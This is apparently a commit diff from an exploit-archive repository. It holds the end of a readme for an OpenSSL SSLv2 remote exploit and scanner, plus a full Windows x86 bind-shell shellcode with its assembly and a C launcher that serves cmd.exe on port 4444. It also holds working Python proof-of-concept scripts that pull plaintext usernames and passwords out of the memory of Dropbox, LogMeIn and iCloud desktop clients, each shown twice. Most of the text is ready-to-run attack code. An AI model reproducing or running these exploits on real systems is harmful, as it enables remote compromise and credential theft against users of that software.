If the server traffic is high, the exploit might fail. If the
memory allocation patterns are different, the exploit might fail.
If you have a wrong GOT address, the exploit will definitely fail.
---------[ How Does openssl-too-open Work? ]
openssl-scanner overflows the master_key_length, master_key[] and session_id_length
variables in the SSL_SESSION structure. The first two are uninitialized at this point,
so overwriting them has no effect on openssl. The first place where the session_id_length
variable is used after we overwrite it is in session_finish() (ssl/s2_srvr.c:847)
memcpy(p,s->session->session_id, (unsigned int)s->session->session_id_length);
This data is returned in the SERVER_FINISHED packet. openssl-scanner checks the length
of the data. If it matches the value we set session_id_length to, then the server is
exploitable.
OpenSSL 0.9.6e and higher versions return
192.160.0.2: Server error: SSL2_PE_UNDEFINED_ERROR (0x00) after KEY_ARG data was sent. Server is not vulnerable.
The updates that most vendors have put out backport the changes from 0.9.6e to 0.9.6b
or some other version of OpenSSL. They don't return an error like 0.9.6e.
The updated RedHat and Debian packages) would close the connection immediatelly
after they receive the oversized KEY_ARG data, causing openssl-scanner to report
192.168.0.1: Connection closed after KEY_ARG data was sent. Server is most likely not vulnerable.
IIS servers exhibit the same behavior.
IIS servers that don't have a certificate set up close the connection as soon as
they receive the CLIENT_HELLO packet. openssl-scanner reports this as
192.168.0.2: Connection unexpectedly closed
/* EOF */
http://www.phreedom.org/solar/exploits/apache-openssl/openssl-too-open.tar.gz
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40347.tar.gz (openssl-too-open.tar.gz)

2
platforms/linux/remote/764.c → platforms/unix/remote/764.c
View file

@ -1,5 +1,5 @@
/*
* http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
* E-DB Note: Updating OpenFuck Exploit ~ http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
*
* OF version r00t VERY PRIV8 spabam
* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto

519
platforms/win_x86/shellcode/40352.c Executable file
View file

@ -0,0 +1,519 @@
/*
# Title : Windows x86 bind shell tcp shellcode
# Author : Roziul Hasan Khan Shifat
# Date : 08-09-2016
# Tested On : Windows 7 Ultimate , Starter x86
*/
//Note: This shellcode will only works on x86
/*
section .text
global _start
_start:
xor ecx,ecx
mov eax,[fs:ecx+0x30] ;PEB
mov eax,[eax+0xc] ;PEB.Ldr
mov esi,[eax+0x14] ;PEB.Ldr->InMemOrderModuleList
lodsd
xchg esi,eax
lodsd
mov edi,[eax+0x10] ;kernel32.dll base address
mov ebx,[edi+0x3c] ;DOS->elf_anew
add ebx,edi ;PE HEADER
mov ebx,[ebx+0x78]
add ebx,edi ;kernel32 IMAGE_EXPORT_DIRECTORY
sub esp,32
lea esi,[esp]
mov cx,660
mov edx,[ebx+0x1c] ;AddressOfFunctions
add edx,edi
mov eax,[edx+ecx]
add eax,edi
mov [esi],dword eax ;CreateProcessA() at offset 0
mov cx,1128
mov eax,[edx+ecx]
add eax,edi
mov [esi+4],dword eax ;ExitProcess() at offset 4
;------------------------------------
;finding base address of ws2_32.dll
mov cx,3312
mov eax,[edx+ecx]
add eax,edi
xor ecx,ecx
push 0x41416c6c
mov [esp+2],word cx
push 0x642e3233
push 0x5f327377
lea ebx,[esp]
push ebx
call eax
;---------------------------
mov edi,eax
;---------------------
mov ebx,[edi+0x3c] ;DOS->elf_anew
add ebx,edi ;PE HEADER
mov ebx,[ebx+0x78]
add ebx,edi ; ws2_32.dll IMAGE_EXPORT_DIRECTORY
mov edx,[ebx+0x1c] ;AddressOfFunctions
add edx,edi
xor ecx,ecx
mov cx,456
mov eax,[edx+ecx]
add eax,edi
mov [esi+8],dword eax ;WSAStartup() at offset 8
mov cx,392
mov eax,[edx+ecx]
add eax,edi
mov [esi+12],dword eax ;WSASocketA() at offset 12
mov eax,[edx+4]
add eax,edi
mov [esi+16],dword eax ;bind() at offset 16
mov eax,[edx+48]
add eax,edi
mov [esi+20],dword eax ;listen() at offset 20
mov eax,[edx]
add eax,edi
mov [esi+24],dword eax ;accept() at offset 24
mov eax,[edx+80]
add eax,edi
mov [esi+28],dword eax ;setsockopt() at offset 28
;-------------------------------------------------
;WSAStartup(514, &WSADATA)
mov cx,400
sub esp,ecx
lea ebx,[esp]
mov cx,514
push ebx
push ecx
call dword [esi+8]
;-----------------------------------------
;WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,NULL,NULL)
xor ecx,ecx
push ecx
push ecx
push ecx
mov cl,6
push ecx
sub ecx,5
push ecx
inc ecx
push ecx
call dword [esi+12]
;----------------------------
mov edi,eax ;SOCKET
;----------------------------------
;setsockopt(sock,0xffff,4,&int l=1,int j=2)
cdq
mov dl,2
push edx
dec edx
push edx
lea ecx,[esp]
mov dl,4
push ecx
push edx
mov dx,0xffff
push edx
push edi
call dword [esi+28]
;--------------------------------------------
;bind(SOCKET,(struct sockaddr *)&struct sockaddr_in,16);
cdq
push edx
push edx
push edx
push edx
mov [esp],byte 2
mov [esp+2],word 0x5c11 ;port 4444
lea ecx,[esp]
mov dl,16
push edx
push ecx
push edi
call dword [esi+16]
;--------------------------------
;listen(SOCKET,1);
cdq
inc edx
push edx
push edi
call dword [esi+20]
;-----------------------------
;accept(SOCKET,(struct sockaddr *)&struct sockaddr_in,&16);
cdq
push edx
push edx
push edx
push edx
mov dl,16
lea ecx,[esp]
push edx
lea ebx,[esp]
push ebx
push ecx
push edi
call dword [esi+24]
;-----------------------
mov edi,eax ;CLIent socket
;-----------------------
cdq
sub esp,16
lea ebx,[esp] ;PROCESS_INFORMATION
push edi
push edi
push edi
push edx
push edx
mov dl,255
inc edx
push edx
cdq
push edx
push edx
push edx
push edx
push edx
push edx
push edx
push edx
push edx
push edx
mov dl,68
push edx
lea ecx,[esp] ;STARTUPINFOA
cdq
push 0x41657865
mov [esp+3],byte dl
push 0x2e646d63
lea eax,[esp]
;---------------------------------------------
;CreateProcessA(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&STARTUPINFOA,&PROCESS_INFORMATION)
push ebx
push ecx
push edx
push edx
push edx
inc edx
push edx
cdq
push edx
push edx
push eax
push edx
call dword [esi]
;-----------------------
push eax
call dword [esi+4]
*/
/*
Disassembly of section .text:
00000000 <_start>:
0: 31 c9 xor %ecx,%ecx
2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax
6: 8b 40 0c mov 0xc(%eax),%eax
9: 8b 70 14 mov 0x14(%eax),%esi
c: ad lods %ds:(%esi),%eax
d: 96 xchg %eax,%esi
e: ad lods %ds:(%esi),%eax
f: 8b 78 10 mov 0x10(%eax),%edi
12: 8b 5f 3c mov 0x3c(%edi),%ebx
15: 01 fb add %edi,%ebx
17: 8b 5b 78 mov 0x78(%ebx),%ebx
1a: 01 fb add %edi,%ebx
1c: 83 ec 20 sub $0x20,%esp
1f: 8d 34 24 lea (%esp),%esi
22: 66 b9 94 02 mov $0x294,%cx
26: 8b 53 1c mov 0x1c(%ebx),%edx
29: 01 fa add %edi,%edx
2b: 8b 04 0a mov (%edx,%ecx,1),%eax
2e: 01 f8 add %edi,%eax
30: 89 06 mov %eax,(%esi)
32: 66 b9 68 04 mov $0x468,%cx
36: 8b 04 0a mov (%edx,%ecx,1),%eax
39: 01 f8 add %edi,%eax
3b: 89 46 04 mov %eax,0x4(%esi)
3e: 66 b9 f0 0c mov $0xcf0,%cx
42: 8b 04 0a mov (%edx,%ecx,1),%eax
45: 01 f8 add %edi,%eax
47: 31 c9 xor %ecx,%ecx
49: 68 6c 6c 41 41 push $0x41416c6c
4e: 66 89 4c 24 02 mov %cx,0x2(%esp)
53: 68 33 32 2e 64 push $0x642e3233
58: 68 77 73 32 5f push $0x5f327377
5d: 8d 1c 24 lea (%esp),%ebx
60: 53 push %ebx
61: ff d0 call *%eax
63: 89 c7 mov %eax,%edi
65: 8b 5f 3c mov 0x3c(%edi),%ebx
68: 01 fb add %edi,%ebx
6a: 8b 5b 78 mov 0x78(%ebx),%ebx
6d: 01 fb add %edi,%ebx
6f: 8b 53 1c mov 0x1c(%ebx),%edx
72: 01 fa add %edi,%edx
74: 31 c9 xor %ecx,%ecx
76: 66 b9 c8 01 mov $0x1c8,%cx
7a: 8b 04 0a mov (%edx,%ecx,1),%eax
7d: 01 f8 add %edi,%eax
7f: 89 46 08 mov %eax,0x8(%esi)
82: 66 b9 88 01 mov $0x188,%cx
86: 8b 04 0a mov (%edx,%ecx,1),%eax
89: 01 f8 add %edi,%eax
8b: 89 46 0c mov %eax,0xc(%esi)
8e: 8b 42 04 mov 0x4(%edx),%eax
91: 01 f8 add %edi,%eax
93: 89 46 10 mov %eax,0x10(%esi)
96: 8b 42 30 mov 0x30(%edx),%eax
99: 01 f8 add %edi,%eax
9b: 89 46 14 mov %eax,0x14(%esi)
9e: 8b 02 mov (%edx),%eax
a0: 01 f8 add %edi,%eax
a2: 89 46 18 mov %eax,0x18(%esi)
a5: 8b 42 50 mov 0x50(%edx),%eax
a8: 01 f8 add %edi,%eax
aa: 89 46 1c mov %eax,0x1c(%esi)
ad: 66 b9 90 01 mov $0x190,%cx
b1: 29 cc sub %ecx,%esp
b3: 8d 1c 24 lea (%esp),%ebx
b6: 66 b9 02 02 mov $0x202,%cx
ba: 53 push %ebx
bb: 51 push %ecx
bc: ff 56 08 call *0x8(%esi)
bf: 31 c9 xor %ecx,%ecx
c1: 51 push %ecx
c2: 51 push %ecx
c3: 51 push %ecx
c4: b1 06 mov $0x6,%cl
c6: 51 push %ecx
c7: 83 e9 05 sub $0x5,%ecx
ca: 51 push %ecx
cb: 41 inc %ecx
cc: 51 push %ecx
cd: ff 56 0c call *0xc(%esi)
d0: 89 c7 mov %eax,%edi
d2: 99 cltd
d3: b2 02 mov $0x2,%dl
d5: 52 push %edx
d6: 4a dec %edx
d7: 52 push %edx
d8: 8d 0c 24 lea (%esp),%ecx
db: b2 04 mov $0x4,%dl
dd: 51 push %ecx
de: 52 push %edx
df: 66 ba ff ff mov $0xffff,%dx
e3: 52 push %edx
e4: 57 push %edi
e5: ff 56 1c call *0x1c(%esi)
e8: 99 cltd
e9: 52 push %edx
ea: 52 push %edx
eb: 52 push %edx
ec: 52 push %edx
ed: c6 04 24 02 movb $0x2,(%esp)
f1: 66 c7 44 24 02 11 5c movw $0x5c11,0x2(%esp)
f8: 8d 0c 24 lea (%esp),%ecx
fb: b2 10 mov $0x10,%dl
fd: 52 push %edx
fe: 51 push %ecx
ff: 57 push %edi
100: ff 56 10 call *0x10(%esi)
103: 99 cltd
104: 42 inc %edx
105: 52 push %edx
106: 57 push %edi
107: ff 56 14 call *0x14(%esi)
10a: 99 cltd
10b: 52 push %edx
10c: 52 push %edx
10d: 52 push %edx
10e: 52 push %edx
10f: b2 10 mov $0x10,%dl
111: 8d 0c 24 lea (%esp),%ecx
114: 52 push %edx
115: 8d 1c 24 lea (%esp),%ebx
118: 53 push %ebx
119: 51 push %ecx
11a: 57 push %edi
11b: ff 56 18 call *0x18(%esi)
11e: 89 c7 mov %eax,%edi
120: 99 cltd
121: 83 ec 10 sub $0x10,%esp
124: 8d 1c 24 lea (%esp),%ebx
127: 57 push %edi
128: 57 push %edi
129: 57 push %edi
12a: 52 push %edx
12b: 52 push %edx
12c: b2 ff mov $0xff,%dl
12e: 42 inc %edx
12f: 52 push %edx
130: 99 cltd
131: 52 push %edx
132: 52 push %edx
133: 52 push %edx
134: 52 push %edx
135: 52 push %edx
136: 52 push %edx
137: 52 push %edx
138: 52 push %edx
139: 52 push %edx
13a: 52 push %edx
13b: b2 44 mov $0x44,%dl
13d: 52 push %edx
13e: 8d 0c 24 lea (%esp),%ecx
141: 99 cltd
142: 68 65 78 65 41 push $0x41657865
147: 88 54 24 03 mov %dl,0x3(%esp)
14b: 68 63 6d 64 2e push $0x2e646d63
150: 8d 04 24 lea (%esp),%eax
153: 53 push %ebx
154: 51 push %ecx
155: 52 push %edx
156: 52 push %edx
157: 52 push %edx
158: 42 inc %edx
159: 52 push %edx
15a: 99 cltd
15b: 52 push %edx
15c: 52 push %edx
15d: 50 push %eax
15e: 52 push %edx
15f: ff 16 call *(%esi)
161: 50 push %eax
162: ff 56 04 call *0x4(%esi)
*/
#include<windows.h>
#include<stdio.h>
#include<shellapi.h>
#include<stdlib.h>
char shellcode[]=\
"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x78\x10\x8b\x5f\x3c\x01\xfb\x8b\x5b\x78\x01\xfb\x83\xec\x20\x8d\x34\x24\x66\xb9\x94\x02\x8b\x53\x1c\x01\xfa\x8b\x04\x0a\x01\xf8\x89\x06\x66\xb9\x68\x04\x8b\x04\x0a\x01\xf8\x89\x46\x04\x66\xb9\xf0\x0c\x8b\x04\x0a\x01\xf8\x31\xc9\x68\x6c\x6c\x41\x41\x66\x89\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x8d\x1c\x24\x53\xff\xd0\x89\xc7\x8b\x5f\x3c\x01\xfb\x8b\x5b\x78\x01\xfb\x8b\x53\x1c\x01\xfa\x31\xc9\x66\xb9\xc8\x01\x8b\x04\x0a\x01\xf8\x89\x46\x08\x66\xb9\x88\x01\x8b\x04\x0a\x01\xf8\x89\x46\x0c\x8b\x42\x04\x01\xf8\x89\x46\x10\x8b\x42\x30\x01\xf8\x89\x46\x14\x8b\x02\x01\xf8\x89\x46\x18\x8b\x42\x50\x01\xf8\x89\x46\x1c\x66\xb9\x90\x01\x29\xcc\x8d\x1c\x24\x66\xb9\x02\x02\x53\x51\xff\x56\x08\x31\xc9\x51\x51\x51\xb1\x06\x51\x83\xe9\x05\x51\x41\x51\xff\x56\x0c\x89\xc7\x99\xb2\x02\x52\x4a\x52\x8d\x0c\x24\xb2\x04\x51\x52\x66\xba\xff\xff\x52\x57\xff\x56\x1c\x99\x52\x52\x52\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x11\x5c\x8d\x0c\x24\xb2\x10\x52\x51\x57\xff\x56\x10\x99\x42\x52\x57\xff\x56\x14\x99\x52\x52\x52\x52\xb2\x10\x8d\x0c\x24\x52\x8d\x1c\x24\x53\x51\x57\xff\x56\x18\x89\xc7\x99\x83\xec\x10\x8d\x1c\x24\x57\x57\x57\x52\x52\xb2\xff\x42\x52\x99\x52\x52\x52\x52\x52\x52\x52\x52\x52\x52\xb2\x44\x52\x8d\x0c\x24\x99\x68\x65\x78\x65\x41\x88\x54\x24\x03\x68\x63\x6d\x64\x2e\x8d\x04\x24\x53\x51\x52\x52\x52\x42\x52\x99\x52\x52\x50\x52\xff\x16\x50\xff\x56\x04";
int main(int i,char *a[])
{
int mode;
if(i==1)
mode=1;
else
mode=atoi(a[1]);
switch(mode)
{
case 1:
ShellExecute(NULL,NULL,a[0],"78",NULL,0);
break;
case 78:
(* (int(*)())shellcode )();
break;
default:
break;
}
return 0;
}

242
platforms/windows/local/40341.txt
View file

@ -1,242 +0,0 @@
#####
# Dropbox Desktop Client v9.4.49 (64bit) Local Credentials Disclosure
# Tested on Windows Windows Server 2012 R2 64bit, English
# Vendor Homepage @ https://www.dropbox.com
# Date 06/09/2016
# Bug Discovery by:
#
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
# http://www.black-rose.ml
#
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
# https://1-33-7.com/
#
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
# http://korznikov.com/
#
#####
# Dropbox Desktop Client v9.4.49 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process.
# A potential attacker could reveal the supplied username and password in order to gain access to account.
#####
# Proof-Of-Concept Code:
import time
import urllib
from winappdbg import Debug, Process
username = ''
password = ''
found = 0
filename = "Dropbox.exe"
process_pid = 0
memory_dump = []
debug = Debug()
try:
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process, process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
if process_pid is not 0:
print "[+] Found process with pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
for address in process.search_bytes('\x26\x70\x61\x73\x73\x77\x6F\x72\x64\x3D'):
memory_dump.append(process.read(address,100))
for i in range(len(memory_dump)):
email_addr = memory_dump[i].split('email=')[1]
tmp_passwd = memory_dump[i].split('password=')[1]
username = email_addr.split('\x00')[0]
password = tmp_passwd.split('&is_sso_link=')[0]
if username != '' and password !='':
found = 1
print "[+] Credentials found!\r\n----------------------------------------"
print "[+] Username: %s" % urllib.unquote_plus(username)
print "[+] Password: %s" % password
if found == 0:
print "[-] Credentials not found! Make sure the client is connected."
else:
print "[-] No process found with name '%s'." % (filename)
debug.loop()
finally:
debug.stop()
######################################################################
#####
# LogMeIn Client v1.3.2462 (64bit) Local Credentials Disclosure
# Tested on Windows Windows Server 2012 R2 64bit, English
# Vendor Homepage @ https://secure.logmein.com/home/en
# Date 06/09/2016
# Bug Discovery by:
#
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
# http://korznikov.com/
#
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
# https://1-33-7.com/
#
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
# http://www.black-rose.ml
#
#####
# LogMeIn Client v1.3.2462 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process.
# A potential attacker could reveal the supplied username and password in order to gain access to account and associated computers.
#####
# Proof-Of-Concept Code:
import time
import urllib
from winappdbg import Debug, Process
username = ''
password = ''
found = 0
filename = "LMIIgnition.exe"
process_pid = 0
memory_dump = []
debug = Debug()
try:
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process, process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
if process_pid is not 0:
print "[+] Found process with pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
for address in process.search_bytes('\x26\x5F\x5F\x56\x49\x45\x57\x53\x54\x41\x54\x45\x3D'):
memory_dump.append(process.read(address,150))
for i in range(len(memory_dump[0])):
email_addr = memory_dump[i].split('email=')[1]
tmp_passwd = memory_dump[i].split('password=')[1]
username = email_addr.split('&hiddenEmail=')[0]
password = tmp_passwd.split('&rememberMe=')[0]
if username != '' and password !='':
found = 1
print "[+] Credentials found!\r\n----------------------------------------"
print "[+] Username: %s" % urllib.unquote_plus(username)
print "[+] Password: %s" % password
break
if found == 0:
print "[-] Credentials not found! Make sure the client is connected."
else:
print "[-] No process found with name '%s'." % (filename)
debug.loop()
finally:
debug.stop()
######################################################################
#####
# Apple iCloud Desktop Client v5.2.1.0 Local Credentials Disclosure After Sign Out Exploit
# Tested on Windows Windows 7 64bit, English
# Vendor Homepage @ https://www.apple.com/
# Product Homepage @ https://support.apple.com/en-us/HT204283
# Date 07/09/2016
# Bug Discovery by:
#
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
# http://www.black-rose.ml
#
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
# https://1-33-7.com/
#
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
# http://korznikov.com/
#
#####
# Apple iCloud Desktop Client v5.2.1.0 is vulnerable to local credentials disclosure after the user is logged out.
# It seems that iCloud does not store the supplied credentials while the user is logged in, but after sign out the supplied username and password are stored in a plaintext format in memory process.
# Funny eh?!
# A potential attacker could reveal the supplied username and password in order to gain access to iCloud account.
#
# Authors are not responsible for any misuse or demage which caused by use of this script code.
# Please use responsibly.
#####
# Proof-Of-Concept Code:
import time
import urllib
from winappdbg import Debug, Process
def b2h(str):
return ''.join(["%02X " % ord(x) for x in str]).strip()
def h2b(str):
bytes = []
str = ''.join(str.split(" "))
for i in range(0, len(str), 2):
bytes.append(chr(int(str[i:i+2], 16)))
return ''.join(bytes)
usr = ''
pwd = ''
found = 0
filename = "iCloud.exe"
process_pid = 0
memory_dump = []
debug = Debug()
try:
print "#########################################################################"
print "#\tApple iCloud v5.2.1.0 Local Credentials Disclosure Exploit\t#"
print "# Bug Discovery by Yakir Wizman, Victor Minin, Alexander Korznikov\t#"
print "#\t\tTested on Windows Windows 7 64bit, English\t\t#"
print "#\t\t\tPlease use responsibly.\t\t\t\t#"
print "#########################################################################\r\n"
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process, process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
if process_pid is not 0:
print "[+] Found process with pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
for address in process.search_bytes('\x88\x38\xB7\xAE\x73\x8C\x07\x00\x0A\x16'):
memory_dump.append(process.read(address,50))
try:
str = b2h(memory_dump[0]).split('88 38 B7 AE 73 8C 07 00 0A 16')[1]
usr = h2b(str.split(' 00')[0])
except:
pass
memory_dump = []
for address in process.search_bytes('\x65\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00\x02\x09'):
memory_dump.append(process.read(address,60))
try:
str = b2h(memory_dump[0]).split('07 00 02 09')[1]
pwd = h2b(str.split(' 00')[0])
except:
pass
if usr != '' and pwd !='':
found = 1
print "[+] iCloud Credentials found!\r\n----------------------------------------"
print "[+] Username: %s" % usr
print "[+] Password: %s" % pwd
if found == 0:
print "[-] Credentials not found!"
else:
print "[-] No process found with name '%s'." % (filename)
debug.loop()
finally:
debug.stop()

66
platforms/windows/local/40348.py Executable file
View file

@ -0,0 +1,66 @@
#####
# Dropbox Desktop Client v9.4.49 (64bit) Local Credentials Disclosure
# Tested on Windows Windows Server 2012 R2 64bit, English
# Vendor Homepage @ https://www.dropbox.com
# Date 06/09/2016
# Bug Discovery by:
#
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
# http://www.black-rose.ml
#
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
# https://1-33-7.com/
#
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
# http://korznikov.com/
#
#####
# Dropbox Desktop Client v9.4.49 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process.
# A potential attacker could reveal the supplied username and password in order to gain access to account.
#####
# Proof-Of-Concept Code:
import time
import urllib
from winappdbg import Debug, Process
username = ''
password = ''
found = 0
filename = "Dropbox.exe"
process_pid = 0
memory_dump = []
debug = Debug()
try:
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process, process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
if process_pid is not 0:
print "[+] Found process with pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
for address in process.search_bytes('\x26\x70\x61\x73\x73\x77\x6F\x72\x64\x3D'):
memory_dump.append(process.read(address,100))
for i in range(len(memory_dump)):
email_addr = memory_dump[i].split('email=')[1]
tmp_passwd = memory_dump[i].split('password=')[1]
username = email_addr.split('\x00')[0]
password = tmp_passwd.split('&is_sso_link=')[0]
if username != '' and password !='':
found = 1
print "[+] Credentials found!\r\n----------------------------------------"
print "[+] Username: %s" % urllib.unquote_plus(username)
print "[+] Password: %s" % password
if found == 0:
print "[-] Credentials not found! Make sure the client is connected."
else:
print "[-] No process found with name '%s'." % (filename)
debug.loop()
finally:
debug.stop()

67
platforms/windows/local/40349.py Executable file
View file

@ -0,0 +1,67 @@
#####
# LogMeIn Client v1.3.2462 (64bit) Local Credentials Disclosure
# Tested on Windows Windows Server 2012 R2 64bit, English
# Vendor Homepage @ https://secure.logmein.com/home/en
# Date 06/09/2016
# Bug Discovery by:
#
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
# http://korznikov.com/
#
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
# https://1-33-7.com/
#
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
# http://www.black-rose.ml
#
#####
# LogMeIn Client v1.3.2462 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process.
# A potential attacker could reveal the supplied username and password in order to gain access to account and associated computers.
#####
# Proof-Of-Concept Code:
import time
import urllib
from winappdbg import Debug, Process
username = ''
password = ''
found = 0
filename = "LMIIgnition.exe"
process_pid = 0
memory_dump = []
debug = Debug()
try:
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process, process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
if process_pid is not 0:
print "[+] Found process with pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
for address in process.search_bytes('\x26\x5F\x5F\x56\x49\x45\x57\x53\x54\x41\x54\x45\x3D'):
memory_dump.append(process.read(address,150))
for i in range(len(memory_dump[0])):
email_addr = memory_dump[i].split('email=')[1]
tmp_passwd = memory_dump[i].split('password=')[1]
username = email_addr.split('&hiddenEmail=')[0]
password = tmp_passwd.split('&rememberMe=')[0]
if username != '' and password !='':
found = 1
print "[+] Credentials found!\r\n----------------------------------------"
print "[+] Username: %s" % urllib.unquote_plus(username)
print "[+] Password: %s" % password
break
if found == 0:
print "[-] Credentials not found! Make sure the client is connected."
else:
print "[-] No process found with name '%s'." % (filename)
debug.loop()
finally:
debug.stop()

99
platforms/windows/local/40350.py Executable file
View file

@ -0,0 +1,99 @@
#####
# Apple iCloud Desktop Client v5.2.1.0 Local Credentials Disclosure After Sign Out Exploit
# Tested on Windows Windows 7 64bit, English
# Vendor Homepage @ https://www.apple.com/
# Product Homepage @ https://support.apple.com/en-us/HT204283
# Date 07/09/2016
# Bug Discovery by:
#
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
# http://www.black-rose.ml
#
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
# https://1-33-7.com/
#
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
# http://korznikov.com/
#
#####
# Apple iCloud Desktop Client v5.2.1.0 is vulnerable to local credentials disclosure after the user is logged out.
# It seems that iCloud does not store the supplied credentials while the user is logged in, but after sign out the supplied username and password are stored in a plaintext format in memory process.
# Funny eh?!
# A potential attacker could reveal the supplied username and password in order to gain access to iCloud account.
#
# Authors are not responsible for any misuse or demage which caused by use of this script code.
# Please use responsibly.
#####
# Proof-Of-Concept Code:
import time
import urllib
from winappdbg import Debug, Process
def b2h(str):
return ''.join(["%02X " % ord(x) for x in str]).strip()
def h2b(str):
bytes = []
str = ''.join(str.split(" "))
for i in range(0, len(str), 2):
bytes.append(chr(int(str[i:i+2], 16)))
return ''.join(bytes)
usr = ''
pwd = ''
found = 0
filename = "iCloud.exe"
process_pid = 0
memory_dump = []
debug = Debug()
try:
print "#########################################################################"
print "#\tApple iCloud v5.2.1.0 Local Credentials Disclosure Exploit\t#"
print "# Bug Discovery by Yakir Wizman, Victor Minin, Alexander Korznikov\t#"
print "#\t\tTested on Windows Windows 7 64bit, English\t\t#"
print "#\t\t\tPlease use responsibly.\t\t\t\t#"
print "#########################################################################\r\n"
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process, process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
if process_pid is not 0:
print "[+] Found process with pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
for address in process.search_bytes('\x88\x38\xB7\xAE\x73\x8C\x07\x00\x0A\x16'):
memory_dump.append(process.read(address,50))
try:
str = b2h(memory_dump[0]).split('88 38 B7 AE 73 8C 07 00 0A 16')[1]
usr = h2b(str.split(' 00')[0])
except:
pass
memory_dump = []
for address in process.search_bytes('\x65\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00\x02\x09'):
memory_dump.append(process.read(address,60))
try:
str = b2h(memory_dump[0]).split('07 00 02 09')[1]
pwd = h2b(str.split(' 00')[0])
except:
pass
if usr != '' and pwd !='':
found = 1
print "[+] iCloud Credentials found!\r\n----------------------------------------"
print "[+] Username: %s" % usr
print "[+] Password: %s" % pwd
if found == 0:
print "[-] Credentials not found!"
else:
print "[-] No process found with name '%s'." % (filename)
debug.loop()
finally:
debug.stop()